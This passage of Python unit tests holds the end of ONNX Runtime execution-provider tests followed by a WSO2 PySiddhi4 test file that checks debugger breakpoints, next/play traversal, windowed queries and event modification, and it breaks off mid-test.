) = check_and_normalize_provider_args(providers, provider_options, valid_providers)
self.assertEqual(actual_providers, expected_providers)
self.assertEqual(actual_provider_options, expected_provider_options)
check_success(None, None, [], [])
check_success(["a"], None, ["a"], [{}])
check_success(["a", "b"], None, ["a", "b"], [{}, {}])
check_success([("a", {1: 2}), "b"], None, ["a", "b"], [{"1": "2"}, {}])
check_success(["a", "b"], [{1: 2}, {}], ["a", "b"], [{"1": "2"}, {}])
with self.assertWarns(UserWarning):
check_success(["a", "b", "a"], [{"x": 1}, {}, {"y": 2}], ["a", "b"], [{"x": "1"}, {}])
def check_failure(providers, provider_options):
with self.assertRaises(ValueError):
check_and_normalize_provider_args(providers, provider_options, valid_providers)
# disable this test
# provider not valid
# check_failure(["d"], None)
# providers not sequence
check_failure(3, None)
# providers value invalid
check_failure([3], None)
# provider_options not sequence
check_failure(["a"], 3)
# provider_options value invalid
check_failure(["a"], ["not dict"])
# providers and provider_options length mismatch
check_failure(["a", "b"], [{1: 2}])
# provider options unsupported mixed specification
check_failure([("a", {1: 2})], [{3: 4}])
def testRegisterCustomEPsLibrary(self):
from onnxruntime.capi import _pybind_state as C
available_eps = C.get_available_providers()
# skip amd gpu build
if "kRocmExecutionProvider" in available_eps:
return
if sys.platform.startswith("win"):
shared_library = "test_execution_provider.dll"
elif sys.platform.startswith("darwin"):
# exclude for macos
return
else:
shared_library = "./libtest_execution_provider.so"
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
this = os.path.dirname(__file__)
custom_op_model = os.path.join(this, "testdata", "custom_execution_provider_library", "test_model.onnx")
if not os.path.exists(custom_op_model):
raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))
session_options = C.get_default_session_options()
sess = C.InferenceSession(session_options, custom_op_model, True, True)
sess.initialize_session(
["my_ep"],
[
{
"shared_lib_path": shared_library,
"device_id": "1",
"some_config": "val",
}
],
set(),
)
print("Create session with customize execution provider successfully!")
if __name__ == "__main__":
unittest.main(verbosity=1)
TestDebugger.py
# Copyright (c) 2017, WSO2 Inc. (http://www.wso2.org) All Rights Reserved.
#
# WSO2 Inc. licenses this file to you under the Apache License,
# Version 2.0 (the "License"); you may not use this file except
# in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
import logging
logging.basicConfig(level=logging.INFO)
import time
from time import sleep
from unittest.case import TestCase
from PySiddhi4.core.SiddhiManager import SiddhiManager
from PySiddhi4.core.debugger.SiddhiDebugger import SiddhiDebugger
from PySiddhi4.core.debugger.SiddhiDebuggerCallback import SiddhiDebuggerCallback
from PySiddhi4.core.stream.output.StreamCallback import StreamCallback
from Tests.Util.AtomicInt import AtomicInt
import threading
class TestDebugger(TestCase):
def setUp(self):
self.inEventCount = AtomicInt(0)
self.debugEventCount = AtomicInt(0)
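# Debug events arrive as a linked chain; getCount walks event.getNext() to count how many events a single callback delivered.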
def getCount(self, event):
count = 0
while event is not None:
count += 1
event = event.getNext()
return count
def test_Debugger1(self):
logging.info("Siddi Debugger Test 1: Test next traversal in a simple query")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') " \
"define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query 1') from cseEventStream select symbol, price, volume insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class StreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", StreamCallbackImpl()) # Causes GC Error
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query 1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query 1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEqual("query 1OUT", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at OUT")
elif count == 3:
_self_shaddow.assertEqual("query 1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 4:
_self_shaddow.assertEquals("query 1OUT", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),
"Incorrect debug event received at OUT")
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
sleep(0.1)
self.assertEquals(2, _self_shaddow.inEventCount.get(), "Invalid number of output events")
self.assertEquals(4, _self_shaddow.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger2(self):
logging.info("Siddi Debugger Test 2: Test next traversal in a query with length batch window")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') " \
"define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query1') " \
"from cseEventStream#window.lengthBatch(3) select symbol, price, volume insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 3:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 60.0, 50], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 4:
_self_shaddow.assertEquals("query1OUT", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertEquals(3, _self_shaddow.getCount(event), "Incorrect number of events received")
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(0.1)
self.assertEquals(3, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(6, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger3(self):
logging.info("Siddi Debugger Test 3: Test next traversal in a query with time batch window")
siddhiManager = SiddhiManager()
cseEventStream = "define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query1')" \
+ "from cseEventStream#window.timeBatch(3 sec) " \
+ "select symbol, price, volume " + "insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
current_milli_time = lambda: int(round(time.time() * 1000))
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + "\t" + str(current_milli_time()))
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 3:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 60.0, 50], event.getOutputData(),
"Incorrect debug event received at IN")
# next call will not reach OUT since there is a window
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(4)
self.assertEquals(3, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(3, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger4(self):
logging.info(
"Siddi Debugger Test 4: Test next traversal in a query with time batch window where next call delays 1 sec")
siddhiManager = SiddhiManager()
cseEventStream = "define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query1')" + \
"from cseEventStream#window.timeBatch(1 sec) " + \
"select symbol, price, volume " + \
"insert into OutputStream;"
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
_self_shaddow.assertEquals(1, len(events), "Cannot emit all three events at the same time")
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count != 1 and queryTerminal.name == SiddhiDebugger.QueryTerminal.IN.name:
sleep(1.1)
# next call will not reach OUT since there is a window
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(1.5)
self.assertEquals(3, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(3, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger5(self):
logging.info("Siddi Debugger Test 5: Test play in a simple query")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, " + \
"volume int);"
query = "@info(name = 'query1')" + \
"from cseEventStream " + \
"select symbol, price, volume " + \
"insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),
"Incorrect debug event received at OUT")
debugger.play()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
sleep(0.1)
self.assertEquals(2, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(2, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger6(self):
logging.info("Siddi Debugger Test 6: Test play traversal in a query with length batch window")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, " + \
"volume int);"
query = "@info(name = 'query1')" + \
"from cseEventStream#window.lengthBatch(3) " + \
"select symbol, price, volume " + \
"insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 3:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 60.0, 50], event.getOutputData(),
"Incorrect debug event received at IN")
debugger.play()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(0.1)
self.assertEquals(3, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(3, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger7(self):
logging.info("Siddi Debugger Test 7: Test play traversal in a query with time batch window")
siddhiManager = SiddhiManager()
cseEventStream = "define stream cseEventStream (symbol string, price float, volume int);";
query = "@info(name = 'query1')" + \
"from cseEventStream#window.timeBatch(3 sec) " + \
"select symbol, price, volume " + \
"insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
current_milli_time = lambda: int(round(time.time() * 1000))
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + "\t" + str(current_milli_time()))
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 3:
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 60.0, 50], event.getOutputData(),
"Incorrect debug event received at IN")
debugger.play()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(3.5)
self.assertEquals(3, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(3, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger8(self):
logging.info(
"Siddi Debugger Test 8: Test play traversal in a query with time batch window where play call delays" + \
" 1 sec")
siddhiManager = SiddhiManager()
cseEventStream = "define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query1')" + \
"from cseEventStream#window.timeBatch(1 sec) " + \
"select symbol, price, volume " + \
"insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
_self_shaddow.assertEquals(1, _self_shaddow.getCount(event),
"Only one event can be emitted from the window")
if count != 1 and "query1IN" == queryName:
sleep(1)
debugger.play()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
inputHandler.send(["WSO2", 60.0, 50])
sleep(1.5)
self.assertEquals(3, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(3, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger9(self):
logging.info("Siddi Debugger Test 9: Test state traversal in a simple query")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, " + \
"volume int);"
query = "@info(name = 'query1')" + \
"from cseEventStream#window.length(3) " + \
"select symbol, price, sum(volume) as volume " + \
"insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 2:
queryState = debugger.getQueryState(queryName)
logging.info(queryState)
streamEvent = None
# Order of the query state items is unpredictable
for (k, v) in queryState.items():
if k.startswith("AbstractStreamProcessor"):
streamEvent = v["ExpiredEventChunk"]
break
_self_shaddow.assertListEqual(streamEvent.getOutputData(), ["WSO2", 50.0, None])
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
sleep(1)
self.assertEquals(2, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(4, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger10(self):
logging.info("Siddi Debugger Test 10: Test next traversal in a query with two consequent streams")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') " + \
"define stream cseEventStream (symbol string, price float, volume int); " + \
"define stream stockEventStream (symbol string, price float, volume int); "
query = "@info(name = 'query1')" + \
"from cseEventStream " + \
"select symbol, price, volume " + \
"insert into stockEventStream; " + \
"@info(name = 'query2')" + \
"from stockEventStream " + \
"select * " + \
"insert into OutputStream;"
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if 1 <= count <= 4:
# First four events
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received")
else:
# Next four events
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),
"Incorrect debug event received")
if (count == 1 or count == 5):
_self_shaddow.assertEquals("query1IN", queryName + queryTerminal.name, "Incorrect break point")
elif (count == 2 or count == 6):
_self_shaddow.assertEquals("query1OUT", queryName + queryTerminal.name, "Incorrect break point")
elif (count == 3 or count == 7):
_self_shaddow.assertEquals("query2IN", queryName + queryTerminal.name, "Incorrect break point")
else:
_self_shaddow.assertEquals("query2OUT", queryName + queryTerminal.name, "Incorrect break point")
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
sleep(0.1)
self.assertEquals(2, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(8, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger11(self):
logging.info("Siddi Debugger Test 11: Modify events during debug mode")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') " + \
"define stream cseEventStream (symbol string, price float, volume int); " + \
"define stream stockEventStream (symbol string, price float, volume int); "
query = "@info(name = 'query1')" + \
"from cseEventStream " + \
"select symbol, price, volume " + \
"insert into stockEventStream; " + \
"@info(name = 'query2')" + \
"from stockEventStream " + \
"select * " + \
"insert into OutputStream;"
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", OutputStreamCallbackImpl())
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if (count == 1 or count == 2):
# WSO2 in stream 1
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received")
else:
# IBM in stream 2
_self_shaddow.assertListEqual(["IBM", 50.0, 60], event.getOutputData(),
"Incorrect debug event received")
if count == 2:
# Modify the event at the end of the first stream
# TODO Improve the logic to use assignment operator (writeBacks by assignment operator)
event.setOutputData("IBM", 0)
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
sleep(0.1)
self.assertEquals(1, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(4, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger12(self):
logging.info("Siddi Debugger Test 12: Test debugging two queries with concurrent input")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') " + \
"define stream cseEventStream (symbol string, price float, volume int); " + \
"define stream stockEventStream (symbol string, price float, volume int); "
query = "@info(name = 'query1')" + \
"from cseEventStream " + \
"select * " + \
"insert into OutputStream1; " + \
"@info(name = 'query2')" + \
"from stockEventStream " + \
"select * " + \
"insert into OutputStream2;"
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class OutputStreamCallbackImpl1(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream1", OutputStreamCallbackImpl1())
class OutputStreamCallbackImpl2(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream2", OutputStreamCallbackImpl2())
cseEventStreamInputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
stockEventStreamInputHandler = siddhiAppRuntime.getInputHandler("stockEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query1", SiddhiDebugger.QueryTerminal.IN)
siddhiDebugger.acquireBreakPoint("query2", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def __init__(self):
SiddhiDebuggerCallback.__init__(self)
self.queryOneResumed = AtomicInt(0)
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
_self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if ("query1IN" == queryName):
sleep(1)
self.queryOneResumed.set(1)
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received")
elif "query2IN" == queryName:
# If query2IN is reached, query1IN must left that break point
_self_shaddow.assertTrue(self.queryOneResumed.get(),
"Query 2 thread enterted the checkpoint before query 1 is debugged")
_self_shaddow.assertListEqual(["IBM", 45.0, 80], event.getOutputData(),
"Incorrect debug event received")
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
def thread1_worker():
cseEventStreamInputHandler.send(["WSO2", 50.0, 60])
thread1 = threading.Thread(target=thread1_worker)
thread1.start()
def thread2_worker():
stockEventStreamInputHandler.send(["IBM", 45.0, 80])
thread2 = threading.Thread(target=thread2_worker)
thread2.start()
sleep(2)
self.assertEquals(2, self.inEventCount.get(), "Invalid number of output events")
self.assertEquals(4, self.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_set_debugger_callback(self):
logging.info("Siddi Debugger Wrapper Test 1: Set Debugger Callback")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query 1') from cseEventStream select symbol, price, volume insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class StreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", StreamCallbackImpl()) # Causes GC Error
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
# Callback1
class SiddhiDebuggerCallbackImpl1(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query 1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at IN")
else:
# No more events should be received
_self_shaddow.fail("The callback has not been released")
debugger.play()
# Callback2
class SiddhiDebuggerCallbackImpl2(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
